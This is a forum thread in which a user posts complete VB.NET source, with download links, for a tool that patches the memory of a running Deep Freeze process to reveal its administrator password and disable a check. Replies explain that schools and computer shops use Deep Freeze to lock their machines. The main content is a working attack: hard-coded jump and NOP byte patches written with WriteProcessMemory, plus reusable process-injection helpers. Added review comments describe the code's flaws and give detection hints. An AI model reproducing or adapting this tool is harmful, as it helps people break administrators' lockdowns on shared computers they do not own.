Support Forums

Full Version: [Source] Deep Freeze Pass Reader for 7.10.020.3176
Hello all, this is a video showing how to hack the Deep Freeze password by reading it. I created a simple tool in VB.NET to help me read the valid string characters.

Screenshot:
[Image: 99942763.jpg]

Download Video:
Code:
http://www.mediafire.com/?ns4wf7epp31f5h1

Form Codes:
Code:
' Form for the tool described in the post: it polls a running process by name and,
' on request, overwrites bytes inside that process through the MemoryFunctions helpers
' (GetProcessId, ReadString, ReadByte, WriteASM).
' Every address below is an absolute constant, so the patches only line up with the one
' build that PatchMemoryAddress_Click checks for, and only if that image is mapped where
' these addresses expect it.
' What this leaves on a host, and what monitoring can key on, is a second process holding
' a VM read/write handle to the target and writing into its image.
Public Class Form1
    ' Process name handed to GetProcessId (and from there to Process.GetProcessesByName).
    Public Target As String = "FrzState2k"

    ' Polls for the target process and displays the version string read from it.
    ' GetProcessId opens a new process handle on every call and nothing in this listing
    ' calls CloseHandle, so every tick that finds the process leaks one handle.
    Private Sub Timer1_Tick(sender As System.Object, e As System.EventArgs) Handles Timer1.Tick
        If GetProcessId(Target) = True Then
            'Check process
            ToolStripStatusLabel2.Text = "Process Found"

            ' Check Version
            ' NOTE(review): ReadString loops 0 To CharCount, so this requests 14 bytes, not 13.
            TextBoxVersion.Text = ReadString(&H52AE90, 13).ToString
        Else
            ToolStripStatusLabel2.Text = "Process Not Found."
            ' Nothing in this listing sets Enabled back to True once the process reappears.
            PatchMemoryAddress.Enabled = False
        End If
    End Sub

    ' Copies three values out of the target into the text boxes.
    ' The addresses read here (&H51C5EC, &H51C5F0, &H51C5F4) also appear, little-endian,
    ' inside the byte arrays that PatchAddressMemory writes, so presumably they only hold
    ' meaningful data after that patch is in place and the patched code has run.
    ' There is no check that the process was found: the reads use whatever pHandle holds.
    Private Sub Timer2_Tick(sender As System.Object, e As System.EventArgs) Handles Timer2.Tick
        ' Check characters
        TextBoxPassLength.Text = ReadByte(&H51C5EC)
        TextBoxValidString.Text = ReadString(&H51C5F0, 1)
        TextBoxInvalidString.Text = ReadString(&H51C5F4, 1)
    End Sub

    ' Writes five bytes back to &H447FE6, the first address PatchAddressMemory overwrites.
    ' Nothing in this listing calls it, and it does not touch &H448055 or the blocks at
    ' &H51C5F8 / &H51C60D, so those writes are never reverted by this form.
    Sub PatchRest0reMemory()
        'Restore Memory
        WriteASM(&H447FE6, New Byte() {&H3B, &H45, &HFC, &H74, &H7})
    End Sub

    ' Applies four writes to the target process.
    ' &HE9 is the x86 JMP rel32 opcode: the writes at &H447FE6 and &H448055 replace existing
    ' instructions with jumps, and the writes at &H51C5F8 and &H51C60D supply the bytes
    ' those jumps land on.
    ' NOTE(review): this reading comes from the byte arrays alone; it has not been checked
    ' against the target binary.
    ' WriteASM issues one WriteProcessMemory call per byte and ignores the result, so a
    ' patch lands incrementally while the target keeps running and a failed write is silent.
    Sub PatchAddressMemory()
        'Display Password Length
        WriteASM(&H447FE6, New Byte() {&HE9, &HD, &H46, &HD, 0})
        WriteASM(&H51C5F8, New Byte() {&H3B, &H45, &HFC, &H89, &H5, &HEC, _
                                       &HC5, &H51, &H0, &HF, &H84, &HEB, &HB9, _
                                       &HF2, &HFF, &HE9, &HDF, &HB9, &HF2, &HFF})

        'Display Password Characters
        WriteASM(&H448055, New Byte() {&HE9, &HB3, &H45, &HD, &H0, &H90, &H90, &H90})

        WriteASM(&H51C60D, New Byte() {&H52, &H89, &H15, &HF0, &HC5, &H51, &H0, &HE8, _
                                        &H2F, &HBB, &HFD, &HFF, &H59, &H59, &H89, &HD, &HF4, _
                                        &HC5, &H51, &H0, &HE9, &H37, &HBA, &HF2, &HFF})
    End Sub

    ' Applies the patch only when the version text box holds exactly "7.10.020.3176";
    ' this string compare is the only guard that ties the hard-coded addresses to a build.
    ' On a mismatch it beeps, shows a message and stops both polling timers.
    Private Sub PatchMemoryAddress_Click(sender As System.Object, e As System.EventArgs) Handles PatchMemoryAddress.Click
        If TextBoxVersion.Text = "7.10.020.3176" Then
            Call PatchAddressMemory()
            PatchMemoryAddress.Enabled = False
        Else
            Beep()
            MsgBox("Deep Freeze version is not supported", _
                   MsgBoxStyle.Information, "Message")
            Timer1.Enabled = False
            Timer2.Enabled = False
        End If
    End Sub

    ' Overwrites six bytes at &H411956 with &H90 (x86 NOP). The post does not say which
    ' check this removes. Unlike PatchMemoryAddress_Click there is no version gate, so on
    ' any other build this writes over whatever happens to be at that address.
    Private Sub Button1_Click(sender As System.Object, e As System.EventArgs) Handles Button1.Click
        WriteASM(&H411956, New Byte() {&H90, &H90, &H90, &H90, &H90, &H90})
    End Sub

    ' Writes six bytes back to &H411956. &HF &H84 is the x86 JE/JZ rel32 opcode, so this
    ' presumably restores the branch that Button1_Click removed. No version gate here either.
    Private Sub Button2_Click(sender As System.Object, e As System.EventArgs) Handles Button2.Click
        WriteASM(&H411956, New Byte() {&HF, &H84, &H77, &H1, &H0, &H0})
    End Sub

    ' Empty handler; Timer3 does nothing in this listing.
    Private Sub Timer3_Tick(sender As System.Object, e As System.EventArgs) Handles Timer3.Tick
        
    End Sub
End Class

Module Codes:
Code:
Imports System.ComponentModel

' Helpers for reading and writing another process's memory through kernel32
' (OpenProcess, ReadProcessMemory, WriteProcessMemory, VirtualAllocEx, VirtualProtectEx).
' All helpers share the module-level pHandle, which GetProcessId must set first.
' None of the read/write helpers checks the API return value, so a failed call is
' indistinguishable from reading 0 or from a successful write.
' On a monitored host the visible behaviour is OpenProcess with access mask 56 against
' the target, followed by repeated single-byte ReadProcessMemory / WriteProcessMemory calls.
Module MemoryFunctions
    'Some API declarations
    Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flAllocationType As Integer, ByVal flProtect As Integer) As IntPtr
    Declare Function VirtualProtectEx Lib "kernel32.dll" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal newProtect As Integer, ByRef oldProtect As Integer) As Boolean

    ' Declared but never called in this listing, so handles opened by GetProcessId stay open.
    Public Declare Function CloseHandle Lib "KERNEL32" _
   (ByVal hObject As Int32) _
   As Boolean

    ' Not used anywhere in this listing.
    Public Declare Function GetAsyncKeyState Lib "USER32" _
    (ByVal vKey As Int32) _
    As Int16

    ' Not used anywhere in this listing.
    Public Declare Function IsDebuggerPresent Lib "KERNEL32" () As Boolean

    Public Declare Function OpenProcess Lib "KERNEL32" _
    (ByVal DesiredAccess As Int32, _
     ByVal InheritHandle As Boolean, _
     ByVal ProcessId As Int32) _
    As Int32

    ' NOTE(review): the declared widths differ from the Win32 prototypes: the BOOL return
    ' is declared As Long, and the byte-count out-pointer is ByRef Long here but
    ' ByVal Int64 on ReadProcessMemory below. The Int32 handle and address parameters
    ' assume a 32-bit process. Verify the signatures before reusing these declarations.
    Private Declare Function WriteProcessMemory Lib "kernel32" _
    (ByVal Handle As Integer, _
     ByVal address As Integer, _
     ByRef Value As Int32, _
     ByVal Size As Integer, _
     ByRef lpNumberOfBytesWritten As Long) _
    As Long

    ' Size defaults to 4 bytes; the buffer is a single ByRef Int32, so callers can read
    ' at most four bytes per call through this declaration.
    Private Declare Function ReadProcessMemory Lib "kernel32" _
    (ByVal Handle As Int32, _
     ByVal address As Int32, _
     ByRef Value As Int32, _
     Optional ByVal Size As Int32 = 4, _
     Optional ByVal lpNumberOfBytesWritten As Int64 = 0) _
    As Integer

    'PROCESS ACCESS RIGHTS.
    ' These are Public variables, not Const, so any code in the project can change them.
    Public PROCESS_TERMINATE As Int32 = 1
    Public PROCESS_CREATE_THREAD As Int32 = 2
    Public PROCESS_VM_OPERATION As Int32 = 8
    Public PROCESS_VM_READ As Int32 = 16
    Public PROCESS_VM_WRITE As Int32 = 32
    Public PROCESS_DUP_HANDLE As Int32 = 64
    Public PROCESS_CREATE_PROCESS As Int32 = 128
    Public PROCESS_SET_QUOTA As Int32 = 256
    Public PROCESS_SET_INFORMATION As Int32 = 512
    Public PROCESS_QUERY_INFORMATION As Int32 = 1024
    Public PROCESS_SUSPEND_RESUME As Int32 = 2048
    ' NOTE(review): 4091 is the sum of the eleven rights listed above, not the Windows SDK
    ' value of PROCESS_ALL_ACCESS (which also includes the standard rights and SYNCHRONIZE).
    ' It is not referenced in this listing.
    Public PROCESS_ALL_ACCESS As Int32 = 4091

    'ALLOCATION TYPES.
    Public MEM_COMMIT As Int32 = 4096
    Public MEM_RESERVE As Int32 = 8192
    Public MEM_RESET As Int32 = 524288
    Public MEM_TOP_DOWN As Int32 = 1048576
    Public MEM_PHYSICAL As Int32 = 4194304

    'MEMORY PROTECTION TYPES.
    Public PAGE_NOACCESS As Int32 = 1
    Public PAGE_READONLY As Int32 = 2
    Public PAGE_READWRITE As Int32 = 4
    Public PAGE_WRITECOPY As Int32 = 8
    Public PAGE_EXECUTE As Int32 = 16
    Public PAGE_EXECUTE_READ As Int32 = 32
    Public PAGE_EXECUTE_READWRITE As Int32 = 64
    Public PAGE_EXECUTE_WRITECOPY As Int32 = 128

    ' Id of the process found by GetProcessId.
    Private process_id As Int32 = 0
    ' Handle used by every read/write helper below; 0 until GetProcessId succeeds.
    Public pHandle As Integer = 0
    ' Not used anywhere in this listing.
    Dim FlagValue As Integer

    'Checks to see if the game is running (returns True or False) and sets the pHandle *REQUIRED TO USE*
    ' Takes the first process whose name matches game_name and opens it with access mask
    ' 56 = 8 + 16 + 32, i.e. PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE
    ' from the constants above.
    ' NOTE(review): the OpenProcess result is not checked, so this returns True even when
    ' the open fails and pHandle is 0. Each call also overwrites pHandle without closing
    ' the previous handle.
    Public Function GetProcessId(ByVal game_name As String) As Boolean
        For Each p As Process In Process.GetProcessesByName(game_name)
            process_id = p.Id
            pHandle = OpenProcess(56, False, process_id)
            Return True
        Next
        Return False
    End Function

    'Allocates memory in the process and returns the starting address of the allocated area
    ' Requests 2048 bytes, committed, with PAGE_EXECUTE_READWRITE protection.
    ' Returns 0 when the allocation fails. Not called anywhere in this listing.
    Public Function AllocMem() As Integer
        Dim pBlob As IntPtr = VirtualAllocEx(pHandle, New IntPtr(), New IntPtr(2048), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
        If pBlob = IntPtr.Zero Then
            Return 0
            ' NOTE(review): unreachable, the Return above exits first, so the failure is silent.
            MsgBox("Error allocating memory space.", MsgBoxStyle.Critical, "Message")
        Else : Return pBlob
        End If
    End Function

    'Changes the protection of the page with the specified starting address to PAGE_EXECUTE_READWRITE
    ' Covers 2048 bytes from AddressOfStart and throws Win32Exception when the call fails.
    ' The previous protection is captured in oldProtect but never restored.
    ' Not called anywhere in this listing.
    Sub RemoveProtection(ByVal AddressOfStart As Integer)
        Dim oldProtect As Integer
        If Not VirtualProtectEx(pHandle, New IntPtr(AddressOfStart), New IntPtr(2048), PAGE_EXECUTE_READWRITE, oldProtect) Then Throw New Win32Exception
    End Sub

    'Writes a single byte value
    ' The Byte argument is passed to a ByRef Int32 parameter with Size = 1.
    ' The WriteProcessMemory result is discarded, so a failed write goes unnoticed.
    Public Sub WriteByte(ByVal address As Integer, ByVal Value As Byte)
        WriteProcessMemory(pHandle, address, Value, 1, 0)
    End Sub

    'Writes a 4 bytes value
    ' The WriteProcessMemory result is discarded here as well.
    Public Sub WriteInt32(ByVal address As Integer, ByVal Value As Int32)
        WriteProcessMemory(pHandle, address, Value, 4, 0)
    End Sub

    'Writes assembly using bytes
    ' Writes the array one byte at a time through WriteByte, i.e. one WriteProcessMemory
    ' call per byte, starting at address.
    Public Sub WriteASM(ByVal address As Int32, ByVal Value As Byte())
        For i As Integer = LBound(Value) To UBound(Value)
            WriteByte(address + i, Value(i))
        Next
    End Sub

    'Searches for a byte pattern and returns the starting address of it
    ' Scans the named module of the first process called GameName, reading one byte per
    ' ReadByte call, and returns the first matching address or 0 when nothing matches.
    ' Indexing (0) on the process list throws when no such process is running.
    ' When ModuleName is not found, BaseAddress and EndAddress stay 0 and the Do loop
    ' still runs once at address 0 before returning 0.
    ' Not called anywhere in this listing.
    Public Function AOBSCAN(ByVal GameName As String, ByVal ModuleName As String, ByVal Signature As Byte()) As Integer
        'To use this, use it like this:
        'Address = AOBSCAN("gamename", "gamename.exe", New Byte () {Bytes go here})
        Dim BaseAddress, EndAddress As Int32
        For Each PM As ProcessModule In Process.GetProcessesByName(GameName)(0).Modules
            If ModuleName = PM.ModuleName Then
                BaseAddress = PM.BaseAddress
                EndAddress = BaseAddress + PM.ModuleMemorySize
            End If
        Next
        Dim curAddr As Int32 = BaseAddress
        Do
            For i As Integer = 0 To Signature.Length - 1
                If ReadByte(curAddr + i) = Signature(i) Then
                    If i = Signature.Length - 1 Then
                        Return curAddr
                    End If
                    Continue For
                End If
                Exit For
            Next
            curAddr += 1
        Loop While curAddr < EndAddress
        Return 0
    End Function

    'Writes to a pointer
    ' For each offset: reads the 4-byte value stored at Pointer, then adds the offset.
    ' Writes Buffer (4 bytes) at the resulting address. Always returns 0; the function has
    ' no As clause, so the return type is Object.
    Public Function WritePointer(ByVal Pointer As Int32, ByVal Buffer As Int32, ByVal OffSet() As Int32)
        For Each I As Integer In OffSet
            ReadProcessMemory(pHandle, Pointer, Pointer)
            Pointer += I
        Next
        WriteProcessMemory(pHandle, Pointer, Buffer, 4, 0)
        Return 0
    End Function

    'Adds a value to a pointer
    ' Same pointer walk as WritePointer, then writes (current 4-byte value + Buffer) at the
    ' resulting address. Always returns 0.
    Public Function WriteAddPointer(ByVal Pointer As Int32, ByVal Buffer As Int32, ByVal OffSet() As Int32)
        For Each I As Integer In OffSet
            ReadProcessMemory(pHandle, Pointer, Pointer)
            Pointer += I
        Next
        WriteProcessMemory(pHandle, Pointer, ReadInt32(Pointer) + Buffer, 4, 0)
        Return 0
    End Function

    'Reads a single byte value and returns it
    ' value starts at 0 and only one byte is requested, so a failed read returns 0,
    ' the same as reading a zero byte.
    Public Function ReadByte(ByVal address As Int32) As Int32
        Dim value As Integer
        ReadProcessMemory(pHandle, address, value, 1, 0)
        Return value
    End Function

    'Reads a 4 bytes value and returns it
    ' A failed read returns 0, the initial value of the local.
    Public Function ReadInt32(ByVal address As Int32) As Int32
        Dim value As Integer
        ReadProcessMemory(pHandle, address, value, 4, 0)
        Return value
    End Function

    'Read String in Memory with char counts
    ' Reads one byte per iteration and appends it to the result as an ASCII character.
    ' NOTE(review): the loop runs 0 To CharCount inclusive, so it reads CharCount + 1
    ' bytes; callers get one character more than they asked for.
    ' NOTE(review): vBuffer is a Long passed to a ByRef Int32 parameter, and the 8-byte
    ' result of BitConverter.GetBytes is decoded to a String and then assigned to a Char;
    ' this presumably relies on Option Strict Off conversions. Confirm before changing it.
    Public Function ReadString(ByVal Address As Int32, ByVal CharCount As Int32) As String
        Dim ret As Byte() = Nothing
        Dim vBuffer As Long
        Dim tStr(CharCount) As Char
        Dim retStr As String = ""
        For i As Int32 = 0 To CharCount
            ReadProcessMemory(pHandle, Address + i, vBuffer, 1, 0)
            ret = BitConverter.GetBytes(vBuffer)
            tStr(i) = System.Text.Encoding.ASCII.GetString(ret) : retStr += tStr(i)
        Next
        Return retStr
    End Function

    'Reads a pointer value and returns it
    ' Same pointer walk as WritePointer; the 4-byte value at the final address is stored
    ' in the ByRef Buffer argument. The function itself always returns 0.
    Public Function ReadPointer(ByVal Pointer As Int32, ByRef Buffer As Int32, ByVal OffSet() As Int32)
        For Each I As Integer In OffSet
            ReadProcessMemory(pHandle, Pointer, Pointer)
            Pointer += I
        Next
        ReadProcessMemory(pHandle, Pointer, Buffer)
        Return 0
    End Function

    'Checks to see if the user has the right game version by checking a 4 bytes address value
    ' Shows a "Version mismatch." message box and returns False when the value differs.
    ' Not called anywhere in this listing.
    Public Function CheckVersion(ByVal AddressToCheck As Integer, ByVal ValueToCheck As Integer) As Boolean
        If ReadInt32(AddressToCheck) = ValueToCheck Then
            Return True
        Else : MsgBox("Version mismatch.", MsgBoxStyle.Critical, "Message")
            Return False
        End If
    End Function

    'Creates a jump from the specified address to a destination address
    ' NOTE(review): the opcode written is &HE8, which is x86 CALL rel32, not JMP (&HE9),
    ' so the comment above and the code disagree.
    ' The NOP bytes (&H90) are written at source + 5 through source + 4 + Nops.
    ' Every path returns 0, which is False for a Boolean function, so the return value
    ' carries no success information. Not called anywhere in this listing.
    Public Function AllocJump(ByVal source As Int32, ByVal destination As Int32, Optional ByVal Nops As Integer = 0) As Boolean
        WriteByte(source, &HE8)
        WriteInt32(source + 1, destination - source - 5)
        If Nops = 0 Then
            Return 0
        End If
        For i As Int32 = 1 To Nops
            WriteByte(source + 4 + i, &H90)
        Next
        Return 0
    End Function

End Module

Screenshot in IDE:
[Image: MYWwQ.png]

Download Executable:
Code:
http://www.mediafire.com/?ns4wf7epp31f5h1

Another rare release of mine. I hope this post doesn't violate the rules, because I thought it would help other people with memory read/write.
Deep freeze is a game? The source looks interesting. And I'm not sure that this would necessarily constitute as hacking, but use words like 'recover' password. Good share.
(05-17-2011, 10:10 AM)KoBE Wrote: [ -> ]Deep freeze is a game? The source looks interesting. And I'm not sure that this would necessarily constitute as hacking, but use words like 'recover' password. Good share.

Deep Freeze is a tool that deletes any data at the end of a user's session. Some schools use it to help stop the spread of viruses.
(05-17-2011, 10:10 AM)KoBE Wrote: [ -> ]Deep freeze is a game? The source looks interesting. And I'm not sure that this would necessarily constitute as hacking, but use words like 'recover' password. Good share.

To most other people this is considered hacking; some computer shops here use Deep Freeze to lock their systems.
(05-17-2011, 10:10 AM)KoBE Wrote: [ -> ]Deep freeze is a game? The source looks interesting. And I'm not sure that this would necessarily constitute as hacking, but use words like 'recover' password. Good share.
Deep Freeze is the same as Shadow Defender: it "freezes" your computer so that any downloaded or installed applications, or any other changes to the system, are wiped after the computer restarts.
Good for testing malwares Oui
Lol first comment was so hilarious , xD .hahaha . Deep Freeze is mainly used on Computer Shops / Computer Cafe's .

Btw thanks for the Share OP Smile. This will be useful.
Dear OP, can you upload the whole source code? Thanks in advance.